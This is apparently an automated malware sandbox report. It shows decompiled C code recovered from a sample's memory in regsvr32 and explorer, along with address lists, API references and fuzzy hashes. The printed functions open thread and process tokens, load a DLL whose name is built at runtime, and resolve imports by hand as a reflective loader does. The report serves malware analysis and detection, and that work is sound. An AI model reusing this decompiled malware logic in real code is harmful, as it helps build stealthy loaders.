                                                                                                                                                                                              0x04b042f5
                                                                                                                                                                                              0x04b042f8
                                                                                                                                                                                              0x04b042f8
                                                                                                                                                                                              0x04b042fe
                                                                                                                                                                                              0x04b04302
                                                                                                                                                                                              0x04b04305
                                                                                                                                                                                              0x04b04307
                                                                                                                                                                                              0x04b04307
                                                                                                                                                                                              0x04b04318
                                                                                                                                                                                              0x04b0431a
                                                                                                                                                                                              0x04b0431a
                                                                                                                                                                                              0x04b04322
                                                                                                                                                                                              0x04b04330
                                                                                                                                                                                              0x04b04333
                                                                                                                                                                                              0x04b04335
                                                                                                                                                                                              0x04b04355
                                                                                                                                                                                              0x04b04355
                                                                                                                                                                                              0x04b04358
                                                                                                                                                                                              0x04b0435e
                                                                                                                                                                                              0x04b0435f
                                                                                                                                                                                              0x04b04362
                                                                                                                                                                                              0x04b04364
                                                                                                                                                                                              0x04b04367
                                                                                                                                                                                              0x04b0436a
                                                                                                                                                                                              0x04b0436d
                                                                                                                                                                                              0x04b04371
                                                                                                                                                                                              0x04b04374
                                                                                                                                                                                              0x04b04377
                                                                                                                                                                                              0x04b0437a
                                                                                                                                                                                              0x04b0437c
                                                                                                                                                                                              0x04b0437c
                                                                                                                                                                                              0x04b0437f
                                                                                                                                                                                              0x04b04381
                                                                                                                                                                                              0x04b04381
                                                                                                                                                                                              0x04b04384
                                                                                                                                                                                              0x04b04386
                                                                                                                                                                                              0x04b04389
                                                                                                                                                                                              0x04b04391
                                                                                                                                                                                              0x04b04394
                                                                                                                                                                                              0x04b04399
                                                                                                                                                                                              0x04b04399
                                                                                                                                                                                              0x04b0439f
                                                                                                                                                                                              0x04b043a2
                                                                                                                                                                                              0x04b043a5
                                                                                                                                                                                              0x04b043a7
                                                                                                                                                                                              0x04b043a7
                                                                                                                                                                                              0x04b043a8
                                                                                                                                                                                              0x04b043a8
                                                                                                                                                                                              0x04b043b3
                                                                                                                                                                                              0x04b043b3
                                                                                                                                                                                              0x04b043b3
                                                                                                                                                                                              0x04b043b6
                                                                                                                                                                                              0x04b043b9
                                                                                                                                                                                              0x04b043b9
                                                                                                                                                                                              0x04b043bc
                                                                                                                                                                                              0x04b043bc
                                                                                                                                                                                              0x04b0437f
                                                                                                                                                                                              0x04b043bf
                                                                                                                                                                                              0x04b043c2
                                                                                                                                                                                              0x04b043c5
                                                                                                                                                                                              0x04b043c7
                                                                                                                                                                                              0x04b043ca
                                                                                                                                                                                              0x04b043cc
                                                                                                                                                                                              0x04b043cf
                                                                                                                                                                                              0x04b043d2
                                                                                                                                                                                              0x04b043d4
                                                                                                                                                                                              0x04b043d7
                                                                                                                                                                                              0x04b043df
                                                                                                                                                                                              0x04b043e7
                                                                                                                                                                                              0x04b043ea
                                                                                                                                                                                              0x04b043ea
                                                                                                                                                                                              0x04b043ea
                                                                                                                                                                                              0x04b043ed
                                                                                                                                                                                              0x04b043ed
                                                                                                                                                                                              0x04b043ed
                                                                                                                                                                                              0x04b043f0
                                                                                                                                                                                              0x04b043f6
                                                                                                                                                                                              0x04b043f8
                                                                                                                                                                                              0x04b043f8
                                                                                                                                                                                              0x04b043fe
                                                                                                                                                                                              0x04b04404
                                                                                                                                                                                              0x04b0440d
                                                                                                                                                                                              0x04b04414
                                                                                                                                                                                              0x04b04416
                                                                                                                                                                                              0x04b04419
                                                                                                                                                                                              0x04b04419
                                                                                                                                                                                              0x04b0441c
                                                                                                                                                                                              0x04b0441c
                                                                                                                                                                                              0x04b0441f
                                                                                                                                                                                              0x04b04421
                                                                                                                                                                                              0x04b04424
                                                                                                                                                                                              0x04b04426
                                                                                                                                                                                              0x04b04441
                                                                                                                                                                                              0x04b04441
                                                                                                                                                                                              0x04b04445
                                                                                                                                                                                              0x04b04448
                                                                                                                                                                                              0x04b0444b
                                                                                                                                                                                              0x04b0444e
                                                                                                                                                                                              0x04b04464
                                                                                                                                                                                              0x04b04464
                                                                                                                                                                                              0x04b04464
                                                                                                                                                                                              0x04b04450
                                                                                                                                                                                              0x04b04450
                                                                                                                                                                                              0x04b04452
                                                                                                                                                                                              0x04b04456
                                                                                                                                                                                              0x04b04459
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0445b
                                                                                                                                                                                              0x04b0445b
                                                                                                                                                                                              0x04b0445d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0445f
                                                                                                                                                                                              0x04b0445f
                                                                                                                                                                                              0x04b0445f
                                                                                                                                                                                              0x04b0445d
                                                                                                                                                                                              0x04b04459
                                                                                                                                                                                              0x04b04468
                                                                                                                                                                                              0x04b0446b
                                                                                                                                                                                              0x04b04470
                                                                                                                                                                                              0x04b0447a
                                                                                                                                                                                              0x04b0447a
                                                                                                                                                                                              0x04b0447a
                                                                                                                                                                                              0x04b0447d
                                                                                                                                                                                              0x04b04428
                                                                                                                                                                                              0x04b04428
                                                                                                                                                                                              0x04b0442a
                                                                                                                                                                                              0x04b04431
                                                                                                                                                                                              0x04b04431
                                                                                                                                                                                              0x04b04433
                                                                                                                                                                                              0x04b04435
                                                                                                                                                                                              0x04b04437
                                                                                                                                                                                              0x04b0443b
                                                                                                                                                                                              0x04b0443d
                                                                                                                                                                                              0x04b0443f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0443f
                                                                                                                                                                                              0x04b0443b
                                                                                                                                                                                              0x04b0442c
                                                                                                                                                                                              0x04b0442c
                                                                                                                                                                                              0x04b0442f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0442f
                                                                                                                                                                                              0x04b0442a
                                                                                                                                                                                              0x04b04487
                                                                                                                                                                                              0x04b04489
                                                                                                                                                                                              0x04b04489
                                                                                                                                                                                              0x04b04494
                                                                                                                                                                                              0x04b04337
                                                                                                                                                                                              0x04b04337
                                                                                                                                                                                              0x04b0433a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0433c
                                                                                                                                                                                              0x04b0433c
                                                                                                                                                                                              0x04b0433e
                                                                                                                                                                                              0x04b04342
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b04344
                                                                                                                                                                                              0x04b04344
                                                                                                                                                                                              0x04b04344
                                                                                                                                                                                              0x04b04347
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0434b
                                                                                                                                                                                              0x04b04354
                                                                                                                                                                                              0x04b04354
                                                                                                                                                                                              0x04b04347
                                                                                                                                                                                              0x04b04342
                                                                                                                                                                                              0x04b0433a
                                                                                                                                                                                              0x04b04326
                                                                                                                                                                                              0x04b0432f
                                                                                                                                                                                              0x04b0432f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                              • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction ID: 7dfbe43e5a9ccba34b83047dddede7a482a9b86a20e275e56cbe1c5b0c2bcd83
                                                                                                                                                                                              • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D11271A006009FDB24CF6DC8C0A6ABBE5FF88305B24C9ADE98AC7781D731F9458B51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFC79E Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AFC79E(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x4b0f818; // 0x4c2f8b0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}






                                                                                                                                                                                              0x04afc7bd
                                                                                                                                                                                              0x04afc7ef
                                                                                                                                                                                              0x04afc7ef
                                                                                                                                                                                              0x04afc7bf
                                                                                                                                                                                              0x04afc7ca
                                                                                                                                                                                              0x04afc7eb
                                                                                                                                                                                              0x04afc7eb
                                                                                                                                                                                              0x04afc7cc
                                                                                                                                                                                              0x04afc7d6
                                                                                                                                                                                              0x04afc7e9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afc7e9
                                                                                                                                                                                              0x04afc7ca
                                                                                                                                                                                              0x04afc7f4

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 04AFC7B1
                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7B8
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7BF
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7E4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1515895013-0
                                                                                                                                                                                              • Opcode ID: 723a37c08532d3558f390287d33d72742558ae8fcdb42754c23bbb3339245a4d
                                                                                                                                                                                              • Instruction ID: 462a48fdbbcd1a9607277f46a22703bf41b736d565515e001d6090542b3400be
                                                                                                                                                                                              • Opcode Fuzzy Hash: 723a37c08532d3558f390287d33d72742558ae8fcdb42754c23bbb3339245a4d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DF03AB2700609EBDB609FE5DC49BAA77FCFB09251F004461F602D3040E764FE408BA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFD218 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E04AFD218(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x4b0f81c; // 0x4c2fbe8
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E04AF9DF2(_t50, 0x392);
					_t66 =  *0x4b0f81c; // 0x4c2fbe8
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E04AF9E51( &_v140, 0x40, L"%08x", E04AFE2C5(_t66 + 0xb0, E04AFA43D(_t66 + 0xb0), 0));
					_t20 =  *0x4b0f81c; // 0x4c2fbe8
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E04AF9DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
					_t26 =  *0x4b0f81c; // 0x4c2fbe8
					_t68 = E04AF9A5A(_t26 + 0x1020);
					_v12 = _t68;
					E04AF8BAF( &_v8);
					_t32 =  *0x4b0f81c; // 0x4c2fbe8
					_t34 = E04AF9A5A(_t32 + 0x122a);
					 *0x4b0f91c = _t34;
					_t35 =  *0x4b0f818; // 0x4c2f8b0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x4b0c9a0,  &_v140, ".", L"dll", 0, 0x4b0c9a0, _t25, 0x4b0c9a0, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x4b0f91c);
					 *0x4b0f914 = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E04AFF011(0x4b0cb8c, _t60);
					}
					 *0x4b0f918 = _t38;
					E04AF8BF4( &_v12, 0xfffffffe);
					E04AF8D6D( &_v140, 0, 0x80);
					if( *0x4b0f918 != 0) {
						goto L10;
					} else {
						E04AF8BF4(0x4b0f91c, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x4b0f918 == 0) {
						_t46 =  *0x4b0f850; // 0x4c2f9f0
						 *0x4b0f918 = _t46;
					}
					L10:
					return 1;
				}
			}

























                                                                                                                                                                                              0x04afd218
                                                                                                                                                                                              0x04afd218
                                                                                                                                                                                              0x04afd218
                                                                                                                                                                                              0x04afd21b
                                                                                                                                                                                              0x04afd227
                                                                                                                                                                                              0x04afd227
                                                                                                                                                                                              0x04afd232
                                                                                                                                                                                              0x04afd24e
                                                                                                                                                                                              0x04afd253
                                                                                                                                                                                              0x04afd25c
                                                                                                                                                                                              0x04afd25e
                                                                                                                                                                                              0x04afd266
                                                                                                                                                                                              0x04afd287
                                                                                                                                                                                              0x04afd28c
                                                                                                                                                                                              0x04afd291
                                                                                                                                                                                              0x04afd299
                                                                                                                                                                                              0x04afd2a6
                                                                                                                                                                                              0x04afd2b4
                                                                                                                                                                                              0x04afd2c5
                                                                                                                                                                                              0x04afd2cb
                                                                                                                                                                                              0x04afd2ce
                                                                                                                                                                                              0x04afd2e5
                                                                                                                                                                                              0x04afd2f1
                                                                                                                                                                                              0x04afd2f9
                                                                                                                                                                                              0x04afd300
                                                                                                                                                                                              0x04afd306
                                                                                                                                                                                              0x04afd312
                                                                                                                                                                                              0x04afd318
                                                                                                                                                                                              0x04afd31f
                                                                                                                                                                                              0x04afd332
                                                                                                                                                                                              0x04afd321
                                                                                                                                                                                              0x04afd321
                                                                                                                                                                                              0x04afd324
                                                                                                                                                                                              0x04afd32a
                                                                                                                                                                                              0x04afd32f
                                                                                                                                                                                              0x04afd334
                                                                                                                                                                                              0x04afd33f
                                                                                                                                                                                              0x04afd351
                                                                                                                                                                                              0x04afd363
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd365
                                                                                                                                                                                              0x04afd36c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd372
                                                                                                                                                                                              0x04afd373
                                                                                                                                                                                              0x04afd373
                                                                                                                                                                                              0x04afd37a
                                                                                                                                                                                              0x04afd37c
                                                                                                                                                                                              0x04afd381
                                                                                                                                                                                              0x04afd381
                                                                                                                                                                                              0x04afd386
                                                                                                                                                                                              0x04afd38a
                                                                                                                                                                                              0x04afd38a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID: %08x$dll
                                                                                                                                                                                              • API String ID: 1029625771-2963171978
                                                                                                                                                                                              • Opcode ID: dc911b79b73d98a0e202e6ada5715cfb8f8b08c7fc552e3922d3479e1fff52f8
                                                                                                                                                                                              • Instruction ID: 0da5de063b9d3ba510b5898ff3a10f17f6cdb82caac78da8643f1312852785c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: dc911b79b73d98a0e202e6ada5715cfb8f8b08c7fc552e3922d3479e1fff52f8
                                                                                                                                                                                              • Instruction Fuzzy Hash: A031A3B2740204AFE720ABA8ED44FEA37ACEB65319F108176F205D7190DB78ED858764
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04B03674 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E04B03674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E04B0358D(_a4);
				 *_t32 = "msxml3.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E04AFA43D();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x4b0cf58;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x4b0cf58;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L04B08935();
				return _t29 - _t22;
			}

















                                                                                                                                                                                              0x04b03674
                                                                                                                                                                                              0x04b0367f
                                                                                                                                                                                              0x04b03686
                                                                                                                                                                                              0x04b0368d
                                                                                                                                                                                              0x04b03693
                                                                                                                                                                                              0x04b0369b
                                                                                                                                                                                              0x04b0369c
                                                                                                                                                                                              0x04b0369e
                                                                                                                                                                                              0x04b036a3
                                                                                                                                                                                              0x04b036ab
                                                                                                                                                                                              0x04b036ab
                                                                                                                                                                                              0x04b036ae
                                                                                                                                                                                              0x04b036b2
                                                                                                                                                                                              0x04b036a5
                                                                                                                                                                                              0x04b036a5
                                                                                                                                                                                              0x04b036a9
                                                                                                                                                                                              0x04b036ab
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b036ab
                                                                                                                                                                                              0x04b036a9
                                                                                                                                                                                              0x04b036bb
                                                                                                                                                                                              0x04b036c4
                                                                                                                                                                                              0x04b036c9
                                                                                                                                                                                              0x04b036cc
                                                                                                                                                                                              0x04b036cf
                                                                                                                                                                                              0x04b036d2
                                                                                                                                                                                              0x04b036d4
                                                                                                                                                                                              0x04b036d4
                                                                                                                                                                                              0x04b036da
                                                                                                                                                                                              0x04b036dd
                                                                                                                                                                                              0x04b036e0
                                                                                                                                                                                              0x04b036e3
                                                                                                                                                                                              0x04b036e8
                                                                                                                                                                                              0x04b036ea
                                                                                                                                                                                              0x04b036ea
                                                                                                                                                                                              0x04b036f0
                                                                                                                                                                                              0x04b036fc
                                                                                                                                                                                              0x04b036fe
                                                                                                                                                                                              0x04b0370a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 04B036BB
                                                                                                                                                                                              • _ftol2_sse.MSVCRT ref: 04B036FE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _ftol2_sselstrlen
                                                                                                                                                                                              • String ID: msxml3.dll
                                                                                                                                                                                              • API String ID: 1292649733-2158035192
                                                                                                                                                                                              • Opcode ID: b7fb38b830989def44c4822986c131b3407c92ffc9477df345bd9663d548a564
                                                                                                                                                                                              • Instruction ID: 028a0402d8b8a3aa397dd5fb6c55157dae048c590d4f9f2d4c10db290f73a216
                                                                                                                                                                                              • Opcode Fuzzy Hash: b7fb38b830989def44c4822986c131b3407c92ffc9477df345bd9663d548a564
                                                                                                                                                                                              • Instruction Fuzzy Hash: A611E532A046499BCF00AFA8E80809E7FB5FFA4351B26C6D9DC55932C1EB31E5A58791
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 02F9370B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E02F9370B(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E02F8EFA7(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}
























                                                                                                                                                                                              0x02f9370b
                                                                                                                                                                                              0x02f93711
                                                                                                                                                                                              0x02f93719
                                                                                                                                                                                              0x02f9372e
                                                                                                                                                                                              0x02f93740
                                                                                                                                                                                              0x02f9374c
                                                                                                                                                                                              0x02f93752
                                                                                                                                                                                              0x02f93757
                                                                                                                                                                                              0x02f93763
                                                                                                                                                                                              0x02f938ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f938ce
                                                                                                                                                                                              0x02f93769
                                                                                                                                                                                              0x02f93772
                                                                                                                                                                                              0x02f93780
                                                                                                                                                                                              0x02f93783
                                                                                                                                                                                              0x02f93792
                                                                                                                                                                                              0x02f93792
                                                                                                                                                                                              0x02f93799
                                                                                                                                                                                              0x02f937a7
                                                                                                                                                                                              0x02f937aa
                                                                                                                                                                                              0x02f937c1
                                                                                                                                                                                              0x02f937c7
                                                                                                                                                                                              0x02f937ce
                                                                                                                                                                                              0x02f937de
                                                                                                                                                                                              0x02f937f6
                                                                                                                                                                                              0x02f937e0
                                                                                                                                                                                              0x02f937e8
                                                                                                                                                                                              0x02f937e8
                                                                                                                                                                                              0x02f937f9
                                                                                                                                                                                              0x02f937fd
                                                                                                                                                                                              0x02f93809
                                                                                                                                                                                              0x02f9380d
                                                                                                                                                                                              0x02f93811
                                                                                                                                                                                              0x02f93815
                                                                                                                                                                                              0x02f93821
                                                                                                                                                                                              0x02f9384c
                                                                                                                                                                                              0x02f93854
                                                                                                                                                                                              0x02f93866
                                                                                                                                                                                              0x02f93872
                                                                                                                                                                                              0x02f93823
                                                                                                                                                                                              0x02f93828
                                                                                                                                                                                              0x02f93833
                                                                                                                                                                                              0x02f9383f
                                                                                                                                                                                              0x02f9383f
                                                                                                                                                                                              0x02f9387b
                                                                                                                                                                                              0x02f93881
                                                                                                                                                                                              0x02f9388b
                                                                                                                                                                                              0x02f938a7
                                                                                                                                                                                              0x02f9388d
                                                                                                                                                                                              0x02f9389c
                                                                                                                                                                                              0x02f9389c
                                                                                                                                                                                              0x02f9388b
                                                                                                                                                                                              0x02f938af
                                                                                                                                                                                              0x02f938b8
                                                                                                                                                                                              0x02f938b8
                                                                                                                                                                                              0x02f938c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f938c6
                                                                                                                                                                                              0x02f937d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f937d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f937aa
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02F93728
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000), ref: 02F937C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                              • API String ID: 4133054770-1584408056
                                                                                                                                                                                              • Opcode ID: 13ba2b1276ffec45e7110135fd0bfb640f7ee2d0c096e27ca1f83442242ffdf4
                                                                                                                                                                                              • Instruction ID: 67ffb6c126d71e1dee9af95083a77a400ebe6da72b0c4432a02583e50a75516d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 13ba2b1276ffec45e7110135fd0bfb640f7ee2d0c096e27ca1f83442242ffdf4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 60617C76E10209EFEF00CF98C485BADBBF1BF08355F248599E915AB291C374AA80CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8EEBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
